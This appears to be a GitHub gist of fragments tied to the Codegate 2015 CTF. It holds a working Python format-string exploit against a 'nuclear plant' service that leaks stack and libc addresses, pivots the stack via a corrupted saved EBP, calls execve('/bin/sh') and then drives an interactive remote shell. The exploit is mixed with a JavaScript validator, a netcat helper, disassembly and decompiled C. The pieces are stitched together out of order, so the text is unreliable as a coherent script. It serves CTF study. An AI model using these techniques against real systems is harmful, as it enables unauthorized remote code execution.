
@vanhoefm
vanhoefm / good_crypto
Created March 22, 2015 17:45
Codegate 2015
function validate() {
var x = document.forms["formxx"]["pwz"].value;
alert(x);
if (x == null || x == "") {
alert("Password must be filled out");
return false;
}
if (!x.match(/^[A-Za-z]+$/)) {
alert("Bad charset");
# -------------- netcatlib.py -----------------------------------
import socket
class Netcat:
# TODO: ip and port should be optional, and an open() method should be added
# TODO: specify a timeout argument as well?
def __init__(self, ip, port):
self.buff = ""
self.soc = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.soc.connect((ip, port))
call 0x80486d0 <printf@plt>
movl $0x8049f3a,(%esp)
call 0x8048750 <puts@plt>
mov -0xc(%ebp),%eax
leave ; equivalent to movl %ebp, %esp
; popl %ebp
ret
; Dump of assembler code for function printf:
push %ebp ; save old frame pointer
mov %esp,%ebp
push %ebx
call 0xb7e8ba0f
add $0x10dd5b,%ebx
sub $0xc,%esp
lea 0xc(%ebp),%eax
mov %eax,0x8(%esp)
mov 0x8(%ebp),%eax
# Step 4 --- Test whether we've got our shell and let the magic happen
# Ask the (hopefully spawned) shell to echo a marker and wait for it to come
# back. If execve never ran, nothing answers, and read_until() (not shown in
# this excerpt) presumably blocks here for good: the Netcat socket in
# netcatlib.py is created without a timeout.
nc.write("echo \"GOT A SHELL\"\n")
nc.read_until("GOT A SHELL\n")
print "\nSUCCESS! We have a shell!\n"
while True:
command = raw_input("$ ")
nc.write(command + "\n")
# quick and dirty way to detect end of output
# Step 3 --- Exploit: trigger the payload so we get a nice shell
# Stack pivot via a corrupted saved frame pointer. location_ebp_printf is
# presumably the saved EBP in printf's frame (pushed in its prologue, see the
# disassembly above); printf restores the bogus value on return, and the
# calling function's own `leave; ret` then does the pivot: after `leave`,
# ESP == location_payload, and `ret` pops the execve address that sits in
# the first dword of PAYLOAD (Step 2).
# minus 4 because leave does "mov %ebp, %esp" and then "pop %ebp"
target_ebp_value = location_payload - 4
# Split the target into its upper and lower 16-bit halves. The two addresses
# placed at the start of EXPLOIT below are the high and low halfwords of the
# saved EBP, so each half is written separately -- presumably via %hn-style
# writes whose character counts these values are; the specifiers themselves
# are not in this excerpt. The comparison that follows decides which half is
# written first.
ebp_ho_count = ((target_ebp_value >> 16) % 0x10000)
ebp_lo_count = (target_ebp_value % 0x10000)
# Target addresses: upper half (offset +2) first, then the lower half.
EXPLOIT = dword_to_bitstring(location_ebp_printf + 2)
EXPLOIT += dword_to_bitstring(location_ebp_printf)
if ebp_ho_count < ebp_lo_count:
# Step 2 --- Payload: place the constructed stack which we will execute subsequently
# Fake stack that the pivoted `ret` of Step 3 lands on. Layout relative to
# location_payload:
#   +0   address of execve           <- consumed by `ret`
#   +4   "AAAA": bogus return address for execve (irrelevant on success)
#   +8   execve arg 1: pointer to "/bin/sh" at +20
#   +12  execve arg 2: argv -> +28
#   +16  execve arg 3: envp -> +28
#   +20  "/bin/sh" (7 bytes)
# Nothing is written past +27: the NUL terminator at +27 and the NULL pointer
# at +28 (so argv == envp == {NULL}) must already be zero in the target
# buffer -- presumably the memset() in handle_plant_creation guarantees this;
# this payload does not.
PAYLOAD = "".join([
    dword_to_bitstring(addrexecve),
    "AAAA",
    dword_to_bitstring(location_payload + 20),
    dword_to_bitstring(location_payload + 28),
    dword_to_bitstring(location_payload + 28),
    "/bin/sh",
])
# Menu option 1 -- presumably the "create plant" path whose name prompt
# receives the payload (the write itself is outside this excerpt).
nc.read_until("Your choice: ")
nc.write("1\n")
# Step 1c--- Get the address of execve
# Format-string read. The plant name starts with the address of fork's GOT
# entry, followed by "%22$s": direct parameter access that prints the string
# at the pointer found in the 22nd vararg slot -- presumably the start of
# this very buffer -- so the leaked bytes are fork's resolved libc address.
# ":ENFORK:" delimits the leak for parsing. (The step title says execve; the
# execve address is presumably derived from fork's via a libc offset,
# outside this excerpt.)
LEAKFORKADDR = dword_to_bitstring(location_got_fork)
LEAKFORKADDR += "%22$s:ENFORK:"
nc.read_until("Your choice: ")
nc.write("1" + "\n")
nc.read_until("Insert name: ")
# The name is padded to exactly 100 bytes, then 8 bytes of 0x01 and 2 bytes
# of 0xFF land at offsets 100-109 of the 0x70-byte plant record read by
# ask_for_string() in handle_plant_creation; which fields they overwrite is
# not visible here. The padding assumes len(LEAKFORKADDR) <= 100, which holds
# for the 17 bytes built above (4-byte address + 13-byte format string).
nc.write(LEAKFORKADDR+"A"*(100-len(LEAKFORKADDR))+"\x01\x01"*4+"\xFF\xFF"+"\n")
# The service echoes the name after this quote; presumably the raw GOT-address
# bytes come first, then fork's address from %22$s, then ":ENFORK:".
nc.read_until("Uranium in nuclear plant \"")
import netcatlib
# Step 0 --- Connect to the target
# Hard-coded local test instance. netcatlib.Netcat sets no socket timeout, so
# every read_until() in this script blocks indefinitely if the service stops
# answering.
nc = netcatlib.Netcat("localhost", 4444)
print "[+] Connected"
# Step 1a --- Defeating ASLR with information leakage: location of stack
# Format-string read of two stack slots via direct parameter access: %10$p
# and %11$p print the 10th and 11th varargs as pointers. The labels mark them
# as a saved EBP and a return address (of a frame near the vulnerable printf,
# presumably); ":ENDEBP:" / ":ENDRET:" delimit the two values for parsing.
INFOLEAK = "%10$p:ENDEBP:%11$p:ENDRET:"
nc.read_until("Your choice: ")
int __cdecl handle_plant_creation(int a1)
{
puts("Creating new plant..");
plantid = *(_DWORD *)(a1 + 5600);
plant_info = (char *)(a1 + 112 * plantid);
memset(plant_info, 0, 112);
ask_for_string((int)"Insert name: ", &entered_plant_name, 0x70u);
*((_WORD *)plant_info + 55) = plantid;
[..]